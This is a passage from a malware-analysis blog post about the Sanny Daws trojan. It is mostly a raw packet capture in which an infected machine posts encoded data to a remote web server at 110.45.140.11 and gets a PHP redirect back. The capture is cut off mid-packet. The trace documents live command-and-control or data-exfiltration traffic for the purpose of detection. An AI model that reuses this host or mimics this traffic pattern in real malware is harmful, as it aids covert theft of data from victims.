E…..@…O…..n-…s.P…rup..P…L…i0pOmYgD3pIgohTLyzXsq8NDZqlgXTWin858YaJmjqI4OXgaSgbGsiNkgV1rdunO0YMUBickon-aehXqbtxy5K9ffSEoLcnMmaj2KfyUzyTsED/yUu8AMRsARg6p3XU68nUcC9TVnpBoSiLibfmaxQWQxtKsYl4REjNaXNhL2/fQTjk2tKfIFlRWfbRSkRkTHcRUkYFqIx3par2uJSMFHxpWNNZxRDGmd1XCEtnxMAMEQzA4uYKcI83q27nH8yENNQnkoyL=tj0qs8IJWWZG8K/39V3yGV1==XThRLrD72y6Aq6MsIey1fOCKcxpBiQs7Vd-hctzJNiFK32z6Swur3afXXVCkWL5/nmY=bX5FW78G/b-cbuUmjWHx3iSm=rJlZE1MGzaLowBNdbTn74l/aN7LACb0ZD7juB6pWeGUs4zjt6o25ohs/3XdNTzlb/rxh//72ljhRpNdfgQN73flu53yQHTXd4VyzaJwZbwu5E1VS5Xe2-X2ErJ9OjppxQ6xrApDzt-g2FJ86=yYrKKIQsKMSBeK6ZJwdSrObMRmpsY1gT8E4yjAdEzw45n2YKNPICTk1E2maO74ikRyyzaM7tz11CnT/-pOjQFfV6JB4ogoNHCfByujpHKOxXVw/bHUYM/WOh8qPkMa9iGyMKm2sXBV7tk48=KCLXairQkqrBCB=IXckaEP/U/SAMMxghuoa-Nq8Ha=7V5bfIjk5IX0nhuF8b7DZK/9LKmtR8dpuWLXF0IGXOhGn651aK=ThM3HKTqLVyQQVmqbLUJoZy5gDCmbglCI1KUdzjtR=zGbo/gcQMBemk/FXz1gQQP1YxC0DpJeeNco7b7ip6EK44dy8COGl0CqiySL/6FqE1N0ALhF74lwQxL49VqkXq3gS=2LaJoioqVuwPjoTFob4Ld5Et8d2pfBiKBPeUPqA13=EiiZOI80hDcFZ06D29mdpVYUcxZjLTLMVkIJtwRq4fZKL=A7-s9jq/Fw5axnudMBl2mOUlZG/inolu5qu-h1d26ltkWdHTP4NPzPNcuYp8u1hNJ2WSeZelknF7T5FZ4F5LT3phiNxeP1EUKiQYfJCx9Zk0VebuEsmUzlrwNQTLaV8BUgj11LKjSs=Jhgn5ZWLEaA2Oexpbwjgi-aAKxB/MMYa5jrG2D=zSmmwyAR48qJOOr=qaW8AFX4xjHDpeoM=SZBHdDHegGhwNTQ=eqVzOCJQqbHbKM4Wq9TIYTDFaXMnX/jhsqNdWFYLO0N7eXX4famqEptzRCK=AnW5Hw4O6bPkGfUR7WtutBTmyVIoZS/dd=BelXfpwKBsiMpaWngbcN9OLy2kq4HsuCrom1HV438WABfJoNO/Gjql5GWFEM9gQjBjTN/opG9-X6prZuawiEYRLPi94wPbl5z7U-qtO8Aa38/b4IAJhREmT4cnmLaTbUwEix0YfwZfcACuD/1CGmEho1hO/I
2012-10-07 11:41:32.097378 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 10221, win 64240, length 0
E..(A…..U,n-…….P.sup…..rP………….
2012-10-07 11:41:32.097431 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [P.], seq 11681:11892, ack 1, win 64240, length 211
E…..@…Tr….n-…s.P…&up..P…….tGaChzeJolPbTyVtxPRdobc1uroQH0ijgdkRmAq5xtg0XZJGmZ6=aEk2HrwDlhV-EpjU7MNqSQTKM/bexl4fp7/lllsSNWaogi1NhY-CNgRRqlaYpbO5i9pnsG-FnQhkb06jDnfiPwfAUXqVqwZx7go1pVNzGmmWQ7VzMOpe1zL4jCxgwckUM0PzIJBa2lj301ShqEqIz1bq&tlink=
2012-10-07 11:41:32.097460 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11681, win 64240, length 0
E..(A…..U+n-…….P.sup…..&P………….
2012-10-07 11:41:32.097527 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [F.], seq 11892, ack 1, win 64240, length 0
E..(..@…UD….n-…s.P….up..P…….
2012-10-07 11:41:32.097559 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11892, win 64240, length 0
E..(A…..U*n-…….P.sup……P………….
2012-10-07 11:41:32.097824 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 11893, win 64239, length 0
E..(A…..U)n-…….P.sup……P………….
2012-10-07 11:41:32.580045 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [P.], seq 1:325, ack 11893, win 64239, length 324
E..lA…..S.n-…….P.sup……P…F…HTTP/1.1 302 Found
Date: Mon, 17 Dec 2012 03:14:07 GMT
Server: Microsoft-IIS/5.0
P3P: CP=’CAO PSA CONi OTR OUR DEM ONL’
X-Powered-By: PHP/4.3.10
Set-Cookie: nb_c_kbaksan_1_133032=hjpWxrJoyZhlc
Location: read.php?db=kbaksan_1&n=133032&p=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

0

2012-10-07 11:41:32.680744 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [P.], seq 1:325, ack 11893, win 64239, length 324
E..lA…..S.n-…….P.sup……P…F…HTTP/1.1 302 Found
Date: Mon, 17 Dec 2012 03:14:07 GMT
Server: Microsoft-IIS/5.0
P3P: CP=’CAO PSA CONi OTR OUR DEM ONL’
X-Powered-By: PHP/4.3.10
Set-Cookie: nb_c_kbaksan_1_133032=hjpWxrJoyZhlc
Location: read.php?db=kbaksan_1&n=133032&p=1
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

0

2012-10-07 11:41:32.680777 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 325, win 63916, length 0
E..(..@…UC….n-…s.P….up..P…….
2012-10-07 11:41:34.019921 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [FP.], seq 325, ack 11893, win 64239, length 0
E..(A…..U&n-…….P.sup……P………….
2012-10-07 11:41:34.019960 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 326, win 63916, length 0
E..(..@…UB….n-…s.P….up..P…….
2012-10-07 11:41:37.016064 IP 172.16.253.129.1140 > 110.45.140.11.80: Flags [S], seq 3631868467, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…U9….n-…t.P.y.3….p……………
2012-10-07 11:41:37.244221 IP 110.45.140.11.80 > 172.16.253.129.1140: Flags [S.], seq 3149882171, ack 3631868468, win 64240, options [mss 1460], length 0
E..,A…..U!n-…….P.t..c;.y.4`………….
2012-10-07 11:41:37.244263 IP 172.16.253.129.1140 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(..@…U@….n-…t.P.y.4..c 110.45.140.11.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
E…..@…S~….n-…t.P.y.4..c

Share Button

One thought on “Sanny Daws Trojan Malware E-Mail Spamming Threat + Snort Signatures

  1. Pingback: Joseph de Saram#Rhodium

Leave a Reply

Your email address will not be published. Required fields are marked *